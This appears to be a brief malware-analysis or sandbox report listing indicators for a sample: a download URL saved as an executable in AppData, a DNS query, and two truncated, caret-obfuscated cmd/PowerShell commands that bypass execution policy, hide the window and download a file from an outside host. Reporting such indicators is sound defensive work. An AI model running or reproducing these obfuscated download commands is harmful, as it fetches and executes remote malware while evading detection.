Technical Information
- http://cocalolo.top/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^ow^Er^sh^E^lL.^EXe ^-E^x^eCutionPOl^I^cY ^b^yPa^sS -n^OprofilE ^-w^inDO^w^ST^y^L^e h^ID^De^N ^(n^ew^-^O^bjEcT ^SyStem.^n^e^T.WebcLiEnt).^dO^WNlO^AdF^i^l^e^('http://cocalolo....
- DNS ASK co###olo.top
- '<SYSTEM32>\cmd.exe' /c "p^ow^Er^sh^E^lL.^EXe ^-E^x^eCutionPOl^I^cY ^b^yPa^sS -n^OprofilE ^-w^inDO^w^ST^y^L^e h^ID^De^N ^(n^ew^-^O^bjEcT ^SyStem.^n^e^T.WebcLiEnt).^dO^WNlO^AdF^i^l^e^('http://cocalolo....' (with hidden window)